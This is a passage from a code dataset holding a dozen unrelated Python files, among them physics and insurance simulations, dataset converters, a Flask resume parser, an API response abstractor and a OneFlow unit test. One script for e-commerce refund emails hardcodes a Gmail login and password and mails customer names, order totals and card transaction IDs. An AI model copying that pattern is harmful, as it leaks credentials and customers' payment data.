kwargs.items():\n self.env[self.env_name][env_key.upper()] = env_value\n\n self.config_manager.save()\n\n def unset(self, env_key):\n # Unset environment variable(s)\n self.should_exist()\n\n del self.env[self.env_name][env_key.upper()]\n\n self.logger.info('Successfully removed \"{}\" from environment \"{}\".'.format(env_key, self.env_name))\n\n def ls(self):\n # List variables in an environment\n self.should_exist()\n\n for env_name, env_items in self.env.items():\n print('[{}]'.format(env_name))\n for env_key, env_val in env_items.items():\n print('{}={}'.format(env_key, env_val))\n\n def setup_environment(self):\n # Load variables into OS environment\n self.should_exist()\n\n for env_key, env_value in self.env[self.env_name].items():\n os.environ[env_key] = str(env_value)\n\n self.logger.info('Environment \"{}\" loaded.'.format(self.env_name))\n","sub_path":"modules/environment/managers.py","file_name":"managers.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"569256222","text":"\n\nfrom Processor import Processor\n\nfrom datetime import *\n\n# processes GSR, Heart Rate to get a 'threat level' from 0 to 3\nclass TimeDisplayProcessor(Processor):\n\n def __init__(self):\n Processor.__init__(self,\"TimeDisplayProcessor\", [(\"Source\",\"Source data stream\")], [\"Timestamp for incoming samples\"],[(\"countdown\",\"Be a counting down clock: value for start time (seconds) else -1\",\"-1\")]) \n self.run()\n\n def processArguments(self,firsttimeStamp):\n self.countdown = float(self.argumentValues[0])\n self.startTime = None\n \n # main data processing function\n def process(self,timeStamp,values,queueNo):\n \n if self.countdown != -1:\n if self.startTime == None:\n self.startTime = timeStamp;\n \n time = self.countdown-(timeStamp-self.startTime)\n if time < 0:\n time = 0\n \n timestr=datetime.fromtimestamp(time).strftime(\"%M:%S\")\n #timestr=timestr[:-4]\n self.addProcessedValues(timestr)\n \n else:\n \n \n timestr=datetime.fromtimestamp(timeStamp).strftime(\"%Y-%m-%d %H:%M:%S.%f\")\n timestr=timestr[:-4]\n self.addProcessedValues(timestr)\n \nif __name__ == '__main__': TimeDisplayProcessor()\n","sub_path":"Vicarious/Vicarious/Processors/TimeDisplayProcessor.py","file_name":"TimeDisplayProcessor.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"426471205","text":"from __future__ import annotations\nfrom dataclasses import dataclass, field\n\n__NAMESPACE__ = \"http://www.travelport.com/schema/common_v38_0\"\n\n\n@dataclass\nclass TaxDetail6:\n \"\"\"\n The tax idetail nformation for a fare quote tax.\n \"\"\"\n class Meta:\n name = \"TaxDetail\"\n namespace = \"http://www.travelport.com/schema/common_v38_0\"\n\n amount: None | str = field(\n default=None,\n metadata={\n \"name\": \"Amount\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n origin_airport: None | str = field(\n default=None,\n metadata={\n \"name\": \"OriginAirport\",\n \"type\": \"Attribute\",\n \"length\": 3,\n }\n )\n destination_airport: None | str = field(\n default=None,\n metadata={\n \"name\": \"DestinationAirport\",\n \"type\": \"Attribute\",\n \"length\": 3,\n }\n )\n country_code: None | str = field(\n default=None,\n metadata={\n \"name\": \"CountryCode\",\n \"type\": \"Attribute\",\n }\n )\n fare_info_ref: None | str = field(\n default=None,\n metadata={\n \"name\": \"FareInfoRef\",\n \"type\": 
\"Attribute\",\n }\n )\n","sub_path":"travelport/models/tax_detail_6.py","file_name":"tax_detail_6.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"314806049","text":"#!/usr/bin/python2.7\n\nimport numpy as np\nfrom numpy import cos,sin,sqrt,power\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom scipy.integrate import odeint\n\n\ng = 9.81\nk = 50\nm = 1\nl = 1\npi = np.pi\n\ndef main():\n\n to = 0\n ang_o = pi/2\n wo = 0\n xo = 0\n vo = 0\n\n co = np.array([ang_o, wo, xo, vo])\n\n tf, dt = 100, 0.01\n\n t = np.arange(0,tf, dt)\n\n solucao = odeint(pendulo_elastico, co, t)\n\n ang, w = solucao[:, 0], solucao[:, 1]\n p, v = solucao[:, 2], solucao[:, 3]\n \n x, y = np.zeros(len(ang)), np.zeros(len(ang))\n\n for i in xrange(len(ang)):\n x[i] = (p[i] + l)*sin(ang[i])\n y[i] = -(p[i] + l)*cos(ang[i])\n\n \n fig=plt.figure()\n ax = plt.axes(xlim=(-2.3,2.3), ylim=(-2.3,2.3))\n line, = ax.plot([], [], 'o-', lw=2)\n\n dot, = ax.plot([], [], 'ro', lw=4)\n time_template = 'Tempo = %.1fs'\n time_text = ax.text(0.05, 0.9, '', transform=ax.transAxes)\n\n def init():\n line.set_data([], [])\n time_text.set_text('')\n dot.set_data([],[])\n return line, time_text, dot\n\n\n def animate(i):\n thisx = [0, x[i]]\n thisy = [0, y[i]]\n\n line.set_data(thisx, thisy)\n dot.set_data(x[i], y[i])\n time_text.set_text(time_template % (i*dt))\n return line, time_text, dot\n\n ani = animation.FuncAnimation(fig, animate, np.arange(0, len(t)), interval=10, blit=True, init_func=init)\n plt.show()\n\n\n\ndef pendulo_elastico(x, t):\n \n o, w, y, v = x[0],x[1], x[2],x[3]\n do, dy = w, v\n\n dv = (l+y)*power(w,2) + g*cos(o) - k*y\n dw = -(w*v + g*(l+y)*sin(o))/(l+y)\n\n dxdt = np.array([do, dw, dy, dv])\n return dxdt\n\nmain()\n","sub_path":"pendulo/elastico_pendulo.py","file_name":"elastico_pendulo.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"478109302","text":"# an insurance risk model\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nsns.set_style('whitegrid')\r\nfrom scipy.stats import expon, lognorm, uniform\r\n\r\n# settings\r\nsim = 300\r\nT = 365 # time scale is day\r\n\r\n# set log-normal distribution\r\n## about random variable need to model\r\nEX = 10000 # mean value\r\nVX = 40000 # variance\r\n## best param of log-normal\r\nsigma2 = np.log((VX / (EX ** 2)) + 1)\r\nmu = np.log(EX) - (sigma2) / 2\r\n\r\n# parameters\r\nLAMBDA = 0.3 # param for interval of claim(Poisson process)\r\nNU = 0.2 # param for interval of new customer(Poisson process)\r\nMU = 0.2 # param for survival time of customer(Poisson process)\r\n\r\n# premium, initial conditions\r\nc = 3000 / T # premium per time for insurance\r\nn0 = 1000 # customers at t = 0\r\na0 = 10000 # capital of insurance company at t = 0\r\n\r\n# distributions\r\nrn = uniform(loc = 0, scale = 1)\r\nclaim_amount = lognorm(s = np.sqrt(sigma2), scale = np.exp(mu)) # amount of each claim\r\ndef nextevent_time(t, n):\r\n X = expon(scale = 1 / (NU + MU + LAMBDA)).rvs(size = 1)\r\n return t + X\r\ndef nextevent_which(n):\r\n U = rn.rvs(size = 1)\r\n p_new = NU / (NU + MU + LAMBDA)\r\n p_lost = MU / (NU + MU + LAMBDA)\r\n p_claim = LAMBDA / (NU + MU + LAMBDA)\r\n if U < p_new:\r\n J = 1 # new customer added\r\n elif p_new <= U and U < p_new + p_lost:\r\n J = 2 # customer lost\r\n else:\r\n J = 3 # claim 
occured\r\n return J\r\n\r\n# each simulation steps\r\ndef eachrun(T):\r\n t = 0 # time variable\r\n n = n0 # number of policyholders\r\n a = a0 # capital of company\r\n tE = nextevent_time(t, n)\r\n while tE <= T:\r\n a += n * c * (tE - t) # revenue during previous event and now\r\n t = tE # move present time\r\n J = nextevent_which(n)\r\n if J == 1:\r\n n += 1\r\n elif J == 2:\r\n n -= 1\r\n else:\r\n Y = claim_amount.rvs(size = 1) # amount of this claim\r\n if Y > a:\r\n I = 0\r\n a -= Y\r\n break\r\n else:\r\n a -= Y # capital decreased\r\n tE = nextevent_time(t, n) # next event time\r\n else:\r\n I = 1\r\n return I, a\r\n\r\n# simulation run\r\nIs = []\r\nesti = []\r\nfor i in range(sim):\r\n result = eachrun(T)\r\n Is = np.append(Is, result[0])\r\n esti = np.append(esti, np.mean(Is))\r\n print('Capital at time T = {0} in {1}th run:'.format(T, i+1), result[1])\r\nesti = np.append(np.nan, esti)\r\n\r\nplt.plot(esti)\r\nplt.title('Estimating probability of solvent')\r\nplt.xlabel('Number of simulations')\r\nplt.ylabel('Probability')\r\nplt.show()\r\n","sub_path":"7_6_an_insurance_risk_model.py","file_name":"7_6_an_insurance_risk_model.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"272786485","text":"import argparse\nimport os\n\nfrom convert_mlqa2xqa import read_mlqa\nfrom convert_tydi2xqa import read_tydi\nfrom convert_xquad2xqa import read_xquad, read_xquad_context\nfrom data import save_xqa\n\n\nLANGUAGE_MAP = {\"th\": \"thai\",\n \"sw\": \"swahili\",\n \"te\": \"telugu\",\n \"fi\": \"finnish\",\n \"be\": \"bengali\",\n \"ru\": \"russian\",\n \"ja\": \"japanese\",\n \"ar\": \"arabic\",\n \"in\": \"indonesian\",\n \"ko\": \"korean\",\n \"en\": \"english\",\n None: None\n }\n\n\ndef main():\n parser = argparse.ArgumentParser(\"Converting corpora (MLQA, XQUAD, TyDi QA) to XQA format\")\n parser.add_argument(\"in_path\", help=\"Path to corpus\")\n parser.add_argument(\"out_path\", help=\"Path where the result should be saved\")\n parser.add_argument(\"-f\", \"--format\", choices=[\"mlqa\", \"xquad\", \"tydi\", \"xquad-context\"],\n help=\"The format of the input corpus\")\n parser.add_argument(\"-p\", \"--part\", choices=[\"train\", \"dev\", \"test\"])\n parser.add_argument(\"-l\", \"--language\", default=None)\n\n args = parser.parse_args()\n part = args.part\n language = args.language\n\n if args.format == \"mlqa\":\n in_file = os.path.join(args.in_path, part, f\"{part}-context-{language}-question-{language}.json\")\n out_path = os.path.join(args.out_path, \"MLQA\")\n corpus = read_mlqa(in_file)\n elif args.format == \"xquad\":\n in_file = os.path.join(args.in_path, f\"xquad.{language}.json\")\n out_path = os.path.join(args.out_path, \"XQUAD\")\n corpus = read_xquad(in_file)\n elif args.format == \"xquad-context\":\n in_file = os.path.join(args.in_path, f\"xquad.{language}.json\")\n out_path = os.path.join(args.out_path, \"XQUAD_context\")\n corpus = read_xquad_context(in_file)\n elif args.format == \"tydi\":\n in_file = os.path.join(args.in_path, f\"v1.0_tydiqa-v1.0-{part}.jsonl.gz\")\n out_path = os.path.join(args.out_path, \"TYDI\")\n corpus = read_tydi(in_file, LANGUAGE_MAP[language])\n else:\n print(\"Wrong corpus format: \", args.format)\n raise NotImplementedError\n\n path = os.path.join(out_path, language)\n if not os.path.exists(path):\n os.makedirs(path)\n json_filename = os.path.join(path, f\"{part}_doc.json\")\n txt_filename = os.path.join(path, f\"{part}.txt\")\n 
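# Added note: save_xqa comes from the local `data` module imported above; it\n    # writes the document JSON and the plain-text questions file side by side.\n    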
save_xqa(corpus, json_filename, txt_filename)\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"baselines/convert_corpora.py","file_name":"convert_corpora.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"10726973","text":"import os\nimport sys\nimport time\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m' \n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\nif len(sys.argv) > 1:\n FOLDER = sys.argv[1]\nelse:\n FOLDER = ''\n\n\nif len(FOLDER) != 0 and os.path.exists(FOLDER):\n files = os.listdir(FOLDER)\nelse:\n print('Path is not defined or folder py this path name is not existing.\\n Browsing by the path \\'\\': ')\n files = os.listdir()\n\nfor f in files:\n if os.path.isdir(FOLDER + '/' + f):\n print(bcolors.OKBLUE, f, bcolors.ENDC)\n else:\n print(bcolors.OKCYAN, f, bcolors.ENDC)\n","sub_path":"Lab1/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"597630307","text":"# -*- coding: utf-8 -*-\n\nclass UserInfo:\n def __init__(self):\n self.userid = 0\n self.phone_num = ''\n self.nickname = ''\n self.sex = 0\n self.age = 0\n self.interest = ''\n self.invite_code = ''\n self.inviter_id = 0\n self.inviter_code = ''\n self.create_time = ''\n\n\nclass UserDevice:\n def __init__(self):\n self.device_id = ''\n self.mac = ''\n self.idfa = ''\n self.platform = ''\n self.userid = 0\n self.status = 0\n\n\nclass AnonymousDevice:\n def __init__(self):\n self.device_id = ''\n self.mac = ''\n self.idfa = ''\n self.platform = ''\n self.flag = 0\n self.sex = 0\n self.age = 0\n self.interest = ''\n self.activate_time = ''\n\n\nclass LoginHistory:\n def __init__(self):\n self.userid = 0\n self.device_id = ''\n self.platform = ''\n self.version = ''\n self.ip = ''\n self.network = ''\n","sub_path":"wangcai_svr/account/src/data_types.py","file_name":"data_types.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"208665887","text":"from collections import namedtuple\n\nPoint = namedtuple(\"Point\", [\"x\", \"y\"])\n\ndata = []\nfolds = []\nX, Y = 0,0\nwith open(\"data/day13.txt\") as f:\n for line in f:\n if line[0].isdigit():\n p = Point(*map(int, line.strip().split(\",\")))\n data.append(p)\n X = max(X, p.x)\n Y = max(Y, p.y)\n elif line.startswith(\"fold\"):\n *_, fold = line.strip().split()\n along, coord = fold.split(\"=\")\n folds.append((along, int(coord)))\n\ngrid = [[(x, y) in data for x in range(X+1)] for y in range(Y+1)]\n\ndef display(grid):\n for x in grid[::-1]:\n print(''.join(map(lambda x: \"#\" if x else \".\", x[::-1])))\n\ndef fold_grid(grid, fold):\n along, coord = fold\n if along == \"y\":\n bottom = grid[:coord][::-1]\n top = grid[coord+1:]\n else:\n bottom = [x[:coord][::-1] for x in grid]\n top = [x[coord+1:] for x in grid]\n for i, x in enumerate(top):\n for j, (y1, y2) in enumerate(zip(x, bottom[i])):\n bottom[i][j] = y1 or y2\n return bottom\n\ndef iter_folds(grid, folds):\n for fold in folds:\n grid = fold_grid(grid, fold)\n yield grid\n\nii = iter_folds(grid, folds)\n\nprint(\"Q1:\", sum(sum(x) for x in next(ii)))\nfor i in ii:\n 
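# Added note: the loop body is intentionally empty -- it just exhausts the\n    # fold iterator so that `i` ends up holding the final folded grid.\n    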
pass\ndisplay(i)\n\n\n\n","sub_path":"2021/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"150581613","text":"\"\"\"\nModule that provides a method for checking an API response for its keys.\n\"\"\"\nimport json\nimport xmltodict\nimport requests\nfrom visuanalytics.analytics.apis import api\n\nlist_limit = 10\n# German display labels for the data types (kept as-is: user-facing values)\ndatatype_converter = {\n    \"int\": \"Zahl\",\n    \"float\": \"Gleitkommazahl\",\n    \"str\": \"Text\",\n    \"bool\": \"Wahrheitswert\",\n    \"nonetype\": \"Ohne Wert\",\n    \"dict\": \"JSON\",\n    \"list\": \"Liste\"\n}\n\n\ndef check_api(req_data):\n    \"\"\"\n    Executes a request against an API and then abstracts the response for the data\n    selection in the frontend.\n\n    :param req_data: Contains information about the request object\n    :type req_data: dict\n    :return: Abstracted version of the response or an error message, and a boolean stating whether the function succeeded\n    \"\"\"\n    req = requests.Request(req_data[\"method\"], req_data[\"url\"], headers=req_data[\"headers\"],\n                           json=req_data.get(\"json\", None), data=req_data.get(\"other\", None), params=req_data[\"params\"])\n    # Make the http request\n    s = requests.session()\n    response = s.send(req.prepare())\n\n    try:\n        list_keys = [\n            \"same_type\",\n            \"length\",\n            \"object\"\n        ]\n        if req_data[\"response_type\"] == \"xml\":\n            content = get_content(json.loads(json.dumps(xmltodict.parse(response.content), indent=4)))\n            if \"error\" in content:\n                return {\n                    \"err_msg\": \"An error occurred while loading the api-data\"\n                }, False\n            if list_keys == list(filter(lambda x: x in list_keys, content.keys())):\n                content = {\n                    \"$toplevel_array$\": content\n                }\n            return content, True\n        elif req_data[\"response_type\"] == \"json\":\n            content = get_content(response.json())\n            if \"error\" in content:\n                return {\n                    \"err_msg\": \"An error occurred while loading the api-data\"\n                }, False\n            if list_keys == list(filter(lambda x: x in list_keys, content.keys())):\n                content = {\n                    \"$toplevel_array$\": content\n                }\n            return content, True\n        else:\n            return {\n                \"err_msg\": f\"Content-Type {req_data['response_type']} of api-request not supported\"\n            }, False\n    except Exception:\n        return {\n            \"err_msg\": \"An error occurred while loading the api-data\"\n        }, False\n\n\ndef get_content(obj):\n    \"\"\"\n    Abstracts the given object depending on its type (dict, list, str, int etc.)\n\n    :param obj: Object to be abstracted\n    :return: Description of the object's data type\n    \"\"\"\n    if type(obj) == list:\n        if len(obj) == 0:\n            return {\n                \"same_type\": True,\n                \"length\" : len(obj),\n                \"object\" : None\n            }\n        elif same_datatypes(obj):\n            obj_type = type(obj[0]).__name__.lower()\n            if obj_type == \"list\" or obj_type == \"dict\":\n                return {\n                    \"same_type\": True,\n                    \"length\" : len(obj),\n                    \"object\" : get_content(obj[0])\n                }\n            else:\n                return {\n                    \"same_type\": True,\n                    \"length\" : len(obj),\n                    \"type\" : get_content(obj[0])\n                }\n        else:\n            result = {\n                \"same_type\": False,\n                \"length\" : len(obj),\n                \"type\" : list(map(lambda x: datatype_converter[type(x).__name__.lower()], obj[:list_limit]))\n            }\n            if len(obj) > list_limit:\n                result.update({\"max_elements\": list_limit})\n            return result\n    elif type(obj) == dict:\n        return dict(zip(obj.keys(), [get_content(obj[key]) for key in obj.keys()]))\n    else:\n        return datatype_converter[type(obj).__name__.lower()]  # obj\n\n\ndef same_datatypes(lst):\n    \"\"\"\n    
Checks whether a list contains only data of the same type. Keys, object lengths etc. are taken into account\n\n    :param lst: List to be checked\n    :type lst: list\n    :return: Boolean, depending on the outcome of the check\n    \"\"\"\n    datatype = type(lst[0]).__name__\n    for item in lst:\n        if type(item).__name__ != datatype:  # return False if the list contains different data types\n            return False\n    # Data types are equal, but are their structures equal too? (for complex data types)\n    if datatype == \"dict\":\n        keys = lst[0].keys()\n        for item in lst:\n            if item.keys() != keys:  # return False if the dictionaries have different keys\n                return False\n    elif datatype == \"list\":\n        if sum([len(x) for x in lst]) / len(lst) != len(lst[0]):  # return False if the inner lists have different lengths\n            return False\n        datatypes = list(map(lambda x: type(x).__name__, lst[0]))\n        for item in lst:\n            if list(map(lambda x: type(x).__name__, item)) != datatypes:  # return False if the elements of the inner lists have different data types\n                return False\n\n    return True\n","sub_path":"src/visuanalytics/analytics/apis/checkapi.py","file_name":"checkapi.py","file_ext":"py","file_size_in_byte":5284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"451186691","text":"from flask import * \r\nfrom app import *\r\napp = Flask(__name__) \r\nimport final\r\nimport font_name\r\nimport os\r\nfrom werkzeug.utils import secure_filename\r\nimport glob\r\nimport csv \r\n\r\n# Loading homepage\r\n@app.route('/')\r\n@app.route('/upload') \r\ndef upload(): \r\n    return render_template(\"upload.html\") \r\n\r\n# Upload file and extract resume details\r\n@app.route('/success', methods = ['GET','POST']) \r\ndef success():\r\n    if request.method =='POST':\r\n        f=request.files['file']\r\n        file = str(f.filename)\r\n        f.save(f.filename)\r\n        #org_file[0] == pdf file and [1] == docx file\r\n        org_file = final.file_convert(file)\r\n        person_info = final.person_details(org_file[0])\r\n        linkin_id = final.linkin(org_file[1])\r\n        no_of_lines = final.no_lines(org_file[0])\r\n        no_of_char = final.no_char(org_file[0])\r\n        font_names = font_name.fontname(org_file[0])\r\n        fontsize = final.font_size(org_file[1])\r\n        total_table = final.count_tables(org_file[1])\r\n        total_img = final.count_img(org_file[0])\r\n        no_of_lines = ' , '.join([str(elem) for elem in no_of_lines])\r\n        no_of_char = ' , '.join([str(elem) for elem in no_of_char])\r\n        font_names = ' , '.join([str(elem) for elem in font_names])\r\n        fontsize = ' , '.join([str(elem) for elem in fontsize])\r\n        for fi in glob.glob(\"*.pdf\"):\r\n            if(fi != org_file[0]):\r\n                os.remove(fi)\r\n        for fi in glob.glob(\"*.docx\"):\r\n            if(fi != org_file[1]):\r\n                os.remove(fi)\r\n        return render_template(\"result.html\",name=person_info['name'],mob=person_info['mobile_number'],\r\n        mail=person_info['email'],linkin=linkin_id,pages=person_info['no_of_pages'],\r\n        lines=no_of_lines,char=no_of_char,font=font_names,f_size=fontsize,table=total_table,\r\n        image=total_img)\r\n\r\n# Run the app\r\nif __name__ == '__main__':\r\n    app.run(debug = True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"70078733","text":"\"\"\"\nCopyright 2020 The OneFlow Authors. 
All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport unittest\nfrom collections import OrderedDict\n\nimport numpy as np\nfrom test_util import GenArgList, type_name_to_flow_type, type_name_to_np_type\n\nimport oneflow.compatible.single_client.unittest\nfrom oneflow.compatible import single_client as flow\nfrom oneflow.compatible.single_client import typing as tp\n\n\ndef compare_with_numpy(device_type, device_num, in_shape, data_type, coeffs):\n assert device_type in [\"cpu\", \"gpu\"]\n assert data_type in [\"float32\", \"double\"]\n flow_data_type = type_name_to_flow_type[data_type]\n flow.clear_default_session()\n if device_type == \"cpu\":\n flow.config.cpu_device_num(device_num)\n else:\n flow.config.gpu_device_num(device_num)\n func_config = flow.FunctionConfig()\n func_config.default_data_type(flow_data_type)\n func_config.default_placement_scope(\n flow.scope.placement(device_type, \"0:0-{}\".format(device_num - 1))\n )\n func_config.default_logical_view(flow.scope.consistent_view())\n x = (np.random.random(in_shape) * 100).astype(type_name_to_np_type[data_type])\n\n def np_polyval_grad(coeffs, x):\n coeffs_len = len(coeffs)\n coeffs_diff = [(coeffs_len - i - 1) * coeffs[i] for i in range(coeffs_len - 1)]\n np_x_diff = np.polyval(coeffs_diff, x)\n return np_x_diff\n\n def assert_prediction_grad(blob: tp.Numpy):\n np_x_diff = np_polyval_grad(coeffs, x)\n assert np.allclose(blob, np_x_diff, rtol=1e-05, atol=1e-05)\n\n @flow.global_function(type=\"train\", function_config=func_config)\n def PolyValJob(x: tp.Numpy.Placeholder(shape=in_shape)):\n with flow.scope.placement(device_type, \"0:0\"):\n x += flow.get_variable(\n name=\"x\",\n shape=in_shape,\n dtype=flow_data_type,\n initializer=flow.zeros_initializer(),\n trainable=True,\n )\n flow.watch_diff(x, assert_prediction_grad)\n out = flow.math.polyval(coeffs, x)\n with flow.scope.placement(device_type, \"0:0\"):\n flow.optimizer.SGD(\n flow.optimizer.PiecewiseConstantScheduler([], [0.0001]), momentum=0\n ).minimize(out)\n return out\n\n of_out = PolyValJob(x).get().numpy()\n np_out = np.polyval(coeffs, x)\n assert np.allclose(of_out, np_out, rtol=1e-05, atol=1e-05)\n\n\ndef gen_arg_list(type):\n arg_dict = OrderedDict()\n if type == \"1n2d\":\n arg_dict[\"device_type\"] = [\"gpu\"]\n arg_dict[\"device_num\"] = [2]\n else:\n arg_dict[\"device_type\"] = [\"cpu\", \"gpu\"]\n arg_dict[\"device_num\"] = [1]\n arg_dict[\"in_shape\"] = [(2, 3)]\n arg_dict[\"data_type\"] = [\"float32\"]\n arg_dict[\"coeffs\"] = [[1.0, 2.0], [1.0, 2.0, 3.0]]\n return GenArgList(arg_dict)\n\n\n@flow.unittest.skip_unless_1n1d()\nclass TestPolyval1n1d(flow.unittest.TestCase):\n def test_polyval(test_case):\n for arg in gen_arg_list(\"1n1d\"):\n compare_with_numpy(*arg)\n\n\n@flow.unittest.skip_unless_1n2d()\nclass TestPolyval1n2d(flow.unittest.TestCase):\n def test_polyval(test_case):\n for arg in gen_arg_list(\"1n2d\"):\n compare_with_numpy(*arg)\n\n\nif __name__ == \"__main__\":\n 
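# Added note: unittest picks up both TestPolyval1n1d and TestPolyval1n2d above;\n    # the skip_unless_* decorators gate each suite on the available device topology.\n    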
unittest.main()\n","sub_path":"python/oneflow/compatible/single_client/test/ops/test_polyval.py","file_name":"test_polyval.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"427220460","text":"import os, shutil, csv\nfrom shadow_database import DatabaseConnection\nfrom shadow_helpers.helpers import set_in_dict\nimport smtplib\nimport time\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\ngmail_user = 'ftoyoda.mmello.ecom@gmail.com' \ngmail_password = '@Alterar123'\n\nserver = smtplib.SMTP_SSL('smtp.gmail.com', 465)\nserver.ehlo()\nserver.login(gmail_user, gmail_password)\n\ndef send_email(to, body,subject):\n\tsent_from = gmail_user \n\n\tmsg = MIMEMultipart()\n\tmsg['From'] = gmail_user\n\tmsg['To'] = to\n\tmsg['Subject'] = subject\n\tmsg.attach(MIMEText(body, 'html'))\n\n\ttry:\n\t\tserver.sendmail(gmail_user, to, msg.as_string())\n\t\tprint('Email sent! %s' % to)\n\texcept:\n\t\tprint('Something went wrong...')\n\nquery = \"\"\"\n\tSELECT distinct\n\t\tvoi.order_sequence, \n\t\tvoi.client_name, \n\t\tvoi.total_order_price,\n\t\ttid,\n\t\tpayment_method_group\n\tfrom bi_vtex_order_items voi\n\twhere voi.order_sequence in ('562345','560994','562457','561581','562575','561777','561144','561349','560945','560974','561882','562092','559499','559700','559951','560053','560253','560260','560354','560907','561966','562000','562162')\n\t\tand payment_method_group = 'creditCard' \n\t;\n\"\"\"\n\ndc = DatabaseConnection()\norders_to_cancel = dc.select(query, strip=True, dict_format=True)\n\nfor order in orders_to_cancel:\n\tsubject = 'Estorno de pedido do e-commerce.'\n\n\tbody = \"\"\"\n\t\t

Boa tarde, Talissa.<br>\n\t\t<br>\n\t\t<p>\n\t\t\tPor favor, estornar o pedido %(order_sequence)s.<br>\n\t\t\t<br>\n\t\t\tNome: %(client_name)s<br>\n\t\t\tValor pedido: %(total_order_price)s<br>\n\t\t\tValor estorno: %(total_order_price)s<br>\n\t\t\tTID: %(tid)s<br>\n\t\t</p>\n\t\t<p>\n\t\t\tAtt,<br>\n\t\t\tFelipe Toyoda\n\t\t</p>
\n\t\"\"\" % order\n\n\tsend_email('talissa.medina@marciamello.com.br', body, subject)\n\t# time.sleep(50)\n\nserver.close()\n","sub_path":"vtex_api/send_email_order_cancel.py","file_name":"send_email_order_cancel.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"457389093","text":"#!/usr/bin/env python\n\n# =============================================================================\n# nnAvicaching_find_weights.py\n# Author: Anmol Kabra -- github: @anmolkabra\n# Project: Solving the Avicaching Game Faster and Better (Summer 2017)\n# -----------------------------------------------------------------------------\n# Purpose of the Script:\n# Refer to the Report (link) for detailed explanation. In a gist, this script \n# learns the weights that highlight the change of eBird agents' behavior \n# after certain rewards are applied. The model uses a **3-layered** neural \n# network.\n# -----------------------------------------------------------------------------\n# Required Dependencies/Software:\n# - Python 2.x (obviously, Anaconda environment used originally)\n# - PyTorch\n# - NumPy\n# -----------------------------------------------------------------------------\n# Required Local Files/Data/Modules:\n# - ./data/*\n# - ./avicaching_data.py\n# =============================================================================\n\nfrom __future__ import print_function\nimport argparse\nimport time\nimport math\nimport os\nimport sys\nimport numpy as np\nimport matplotlib\ntry:\n os.environ[\"DISPLAY\"]\nexcept KeyError as e:\n # working without X/GUI environment\n matplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nimport avicaching_data as ad\n# import torch modules\nimport torch, torch.nn as nn\nimport torch.nn.functional as torchfun\nimport torch.optim as optim\nfrom torch.autograd import Variable\nmatplotlib.rcParams.update({'font.size': 14}) # font-size for plots\n\n# =============================================================================\n# training options\n# =============================================================================\nparser = argparse.ArgumentParser(description=\"NN Avicaching model for finding weights\")\n# training parameters\nparser.add_argument(\"--lr\", type=float, default=0.001, metavar=\"LR\",\n help=\"inputs learning rate of the network (default=0.001)\")\nparser.add_argument(\"--no-cuda\", action=\"store_true\", default=False,\n help=\"disables CUDA training\")\nparser.add_argument(\"--epochs\", type=int, default=10, metavar=\"E\",\n help=\"inputs the number of epochs to train for\")\n# data options\nparser.add_argument(\"--train-percent\", type=float, default=0.8, metavar=\"T\",\n help=\"breaks the data into T percent training and rest testing (default=0.8)\")\nparser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default=1)')\nparser.add_argument(\"--locations\", type=int, default=116, metavar=\"J\",\n help=\"inputs the number of locations (default=116)\")\nparser.add_argument(\"--time\", type=int, default=173, metavar=\"T\",\n help=\"inputs total time of data collection; number of weeks (default=173)\")\nparser.add_argument(\"--rand\", action=\"store_true\", default=False,\n help=\"uses random xyr data\")\n# plot/log options\nparser.add_argument(\"--no-plots\", action=\"store_true\", default=False,\n help=\"skips generating plot maps\")\nparser.add_argument(\"--hide-loss-plot\", action=\"store_true\", default=False,\n 
